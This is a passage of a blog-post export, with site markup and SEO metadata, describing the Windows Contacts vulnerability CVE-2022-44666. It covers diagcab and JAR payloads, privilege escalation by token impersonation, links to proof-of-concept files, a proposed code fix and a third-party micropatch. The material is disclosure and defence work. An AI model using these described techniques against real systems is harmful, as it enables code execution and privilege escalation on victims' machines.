rel=\"noopener noreferrer nofollow\">Eduardo Braun Prado<\/a> gave me the idea to use this technique here.<\/p><p>There are some prerequisites for this:<\/p><ol><li><p>The target user has to belong to the administrators group. If not, there&#8217;s a UAC prompt.<\/p><\/li><li><p>The diagcab file has to be signed, so the code signing certificate must have been installed on the target computer.<\/p><\/li><\/ol><p>A real attack scenario would involve stealing a code signing certificate that is actually installed on the target system. 
But as this is just a proof of concept, a self-signed code signing certificate was generated and used to sign the diagcab file named <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\/MSWord\/hidden\/@payload.diagcab\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@payload.diagcab<\/a>.<\/p><p>So in order to repro, it&#8217;s necessary to install the certificate located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\/cert.cer\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">cert.cer<\/a> under Trusted Root Certificate Authority <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/install-certificate.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">like this<\/a>:<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9mzob1lzx0uqo0cio9w5n.gif\" \/><\/p><p>To finally elevate privileges, token stealing\/impersonation can be used. In this case, the <a href=\"https:\/\/decoder.cloud\/2018\/02\/02\/getting-system\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">&#8220;parent process&#8221; technique<\/a> was the <a href=\"https:\/\/github.com\/decoder-it\/psgetsystem\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">chosen one<\/a>. 
A modified version of this script was included in the resolver scripts.<\/p><p>For further info, there&#8217;s a video for <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/videos\/ldap-msword-diagcab-exploit.gif\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">MS Word and the LDAP URL protocol<\/a>.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9nanz1m340uo3b8a418in.gif\" \/><\/p><p>Proof of concept located in <a href=\"https:\/\/github.com\/j00sean\/CVE-2022-44666\/blob\/main\/bypass\/diagcab-pocs\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">.\/bypass\/diagcab-pocs<\/a>.<\/p><h2>JAR files as payload<\/h2><p><strong><em>Update 2023\/06\/19:<\/em><\/strong> After reading <a href=\"https:\/\/twitter.com\/pfiatde\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@pfiatde<\/a>&#8216;s <a href=\"https:\/\/badoption.eu\/blog\/2023\/06\/01\/zipjar.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">post on &#8220;ZipJar&#8221;<\/a>, this interesting information makes JAR files a good candidate for use as a payload in this vulnerability (which, by the way, is still a 0day today), since the MotW is ignored and no prompt has to be accepted.<\/p><p>The JAR payload was taken from the GitHub repository <a href=\"https:\/\/github.com\/arntsonl\/calc_security_poc\/tree\/master\/jar\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">calc_security_poc<\/a>.<\/p><p>Attached is a little builder, create-poc.py, to make your own PoC from a template.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9ns2a1m070uqo9w9r3fu9.gif\" \/><\/p><p>Don&#8217;t forget to give thanks to <a href=\"https:\/\/twitter.com\/microlovu\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@microlovu<\/a> and <a 
href=\"https:\/\/twitter.com\/mlftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mlftsecresponse<\/a>. \ud83d\ude02<\/p><h2>Proposed fix<\/h2><p>Remember the vulnerable code in the function &#8220;fnSummaryProc&#8221;:<\/p><pre><code>...\nLABEL_44:\n        SafeExecute(v29, v24, v30); \/\/ Vulnerable call to shellexecute\n        return 1i64;\n      }\n    }\n    else\n    {\n      if ( v23 )\n        v32 = IsInternetAddress(v23, &amp;v38); \/\/ Bypass with a single \"@\"\n      else\n        v32 = 0;\n      v29 = v7;\n      if ( v32 )\n      {\n        v30 = v23;\n        goto LABEL_44;\n      }\n    }\n...<\/code><\/pre><p>The function &#8220;IsInternetAddress&#8221; was intentionally created to check whether the href attr corresponds to an email address. So my proposed fix (sticking to the functions the library already imports) would be:<\/p><pre><code>...\n      if (v32 &amp;&amp; !(unsigned int)StrCmpNICW(L\"mailto:\", v23, 7i64)) \/\/ Check that the href really starts with \"mailto:\"\n      {\n          v30 = v23;\n          goto LABEL_44;\n      }\n...<\/code><\/pre><p>As simple as that: it&#8217;s only necessary to perform this check before calling &#8220;SafeExecute&#8221;. Just by testing whether the target string (v23) starts with &#8220;mailto:&#8221;, the bug would be fully fixed IMHO.<\/p><h2>Unofficial fix<\/h2><p>Some days\/weeks ago, when I contacted <a href=\"https:\/\/twitter.com\/mkolsek\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mkolsek<\/a> of <a href=\"https:\/\/0patch.com\/\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">0patch<\/a> (who, by the way, is always very kind to me) to inform him about this issue, he told me this has had <a href=\"https:\/\/blog.0patch.com\/2019\/01\/one-two-three-micropatches-for-three.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">an unofficial fix for Windows 7 since then<\/a> (4 years ago). 
That was a surprise and good news!<\/p><p>It was tested and it successfully stopped the new variant of CVE-2022-44666. The micropatch prepends &#8220;http:\/\/&#8221; to the attacker-controlled string passed in the href attr if it doesn&#8217;t start with &#8220;mailto:&#8221;, &#8220;http:\/\/&#8221; or &#8220;https:\/\/&#8221;, which is enough to fully fix the issue. Now it&#8217;s going to be extended to the latest Windows versions; only some offsets need to be updated.<\/p><p><img decoding=\"async\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/cljp9oans1m3h0uo3epic55i9.gif\" \/><\/p><p>Either way, it would be better to get an official patch.<\/p><h2>Acknowledgments<\/h2><ul><li><p><a href=\"https:\/\/twitter.com\/hyp3rlinx\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@hyp3rlinx<\/a>: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. <s>He should have been also credited for finding this out but unfortunately i was unable to contact him just in time<\/s>. 
It&#8217;s already been done (<strong><em>Update 2023\/02\/08<\/em><\/strong>).<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/edu_braun_0day\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@Edu_Braun_0day<\/a>: who also worked around <a href=\"https:\/\/packetstormsecurity.com\/files\/151267\/Microsoft-Windows-VCF-Arbitrary-Code-Execution.html\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">this issue<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/mkolsek\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@mkolsek<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/matalaz\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@matalaz<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/buffaloverflow\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@buffaloverflow<\/a>.<\/p><\/li><li><p><a href=\"https:\/\/twitter.com\/msftsecresponse\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@msftsecresponse<\/a>.<\/p><\/li><li><p>&#8230;<\/p><\/li><\/ul><p>By <a href=\"https:\/\/twitter.com\/j00sean\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">@j00sean<\/a><\/p><\/div>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" 
data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" 
data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" 
data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>This is the story about another forgotten 0day fully di [&hellip;]<\/p>\n","protected":false},"author":149011790,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-69055","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" 
content=\"article\" \/>\n<meta property=\"og:title\" content=\"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2\" \/>\n<meta property=\"og:description\" content=\"This is the story about another forgotten 0day fully di [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-07-19T06:31:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-07T07:56:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\" \/>\n<meta name=\"author\" content=\"tracylamv2\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"tracylamv2\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\"},\"author\":{\"name\":\"tracylamv2\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\"},\"headline\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink 
control href attribute escape vulnerability (CVE-2022-44666) (0day)\",\"datePublished\":\"2023-07-19T06:31:28+00:00\",\"dateModified\":\"2023-08-07T07:56:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\"},\"wordCount\":3235,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"keywords\":[\"vRx\",\"2023\"],\"articleSection\":[\"vRx\",\"2023\",\"Press Release\"],\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/version-2.com\\\/2023\\\/07\\\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\\\/\",\"url\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\",\"name\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 
2\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"datePublished\":\"2023-07-19T06:31:28+00:00\",\"dateModified\":\"2023-08-07T07:56:21+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb\"},\"inLanguage\":\"zh-HK\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage\",\"url\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\",\"contentUrl\":\"https:\\\/\\\/ik.imagekit.io\\\/14sfaswy6hrz\\\/images\\\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.vicarius.io\\\/blog\\\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9801\",\"item\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\"},{\"@type\":\"ListItem\",\"position\":
2,\"name\":\"Microsoft Windows Contacts (VCF\\\/Contact\\\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#website\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"name\":\"Version 2\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/version-2.com\\\/zh\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-HK\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#organization\",\"name\":\"Version 2\",\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"contentUrl\":\"https:\\\/\\\/i0.wp.com\\\/version-2.com\\\/wp-content\\\/uploads\\\/2020\\\/08\\\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1\",\"width\":1795,\"height\":335,\"caption\":\"Version 
2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/011bc7c3731c930bcfeecd52fefb6365\",\"name\":\"tracylamv2\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/9d01d79cbfd8b2e878f5d701a362cc9fca466d33fec977b59706c23c1a2db15c?s=96&d=identicon&r=g\",\"caption\":\"tracylamv2\"},\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/tracylamv2\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","og_locale":"zh_HK","og_type":"article","og_title":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 2","og_description":"This is the story about another forgotten 0day fully di [&hellip;]","og_url":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","og_site_name":"Version 
2","article_published_time":"2023-07-19T06:31:28+00:00","article_modified_time":"2023-08-07T07:56:21+00:00","og_image":[{"url":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","type":"","width":"","height":""}],"author":"tracylamv2","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"tracylamv2","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"20 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#article","isPartOf":{"@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/"},"author":{"name":"tracylamv2","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/011bc7c3731c930bcfeecd52fefb6365"},"headline":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day)","datePublished":"2023-07-19T06:31:28+00:00","dateModified":"2023-08-07T07:56:21+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/"},"wordCount":3235,"commentCount":0,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#primaryimage"},"thumbnailUrl":"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/images\/clk1ce3oc0d6v0ul9fehvgiix.gif?tr=w-1800,c-at_max","keywords":["vRx","2023"],"articleSection":["vRx","2023","Press 
Release"],"inLanguage":"zh-HK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day#respond"]}]},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2023\/07\/microsoft-windows-contacts-vcf-contact-ldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day\/","url":"https:\/\/www.vicarius.io\/blog\/microsoft-windows-contacts-vcfcontactldap-syslink-control-href-attribute-escape-vulnerability-cve-2022-44666-0day","name":"Microsoft Windows Contacts (VCF\/Contact\/LDAP) syslink control href attribute escape vulnerability (CVE-2022-44666) (0day) - Version 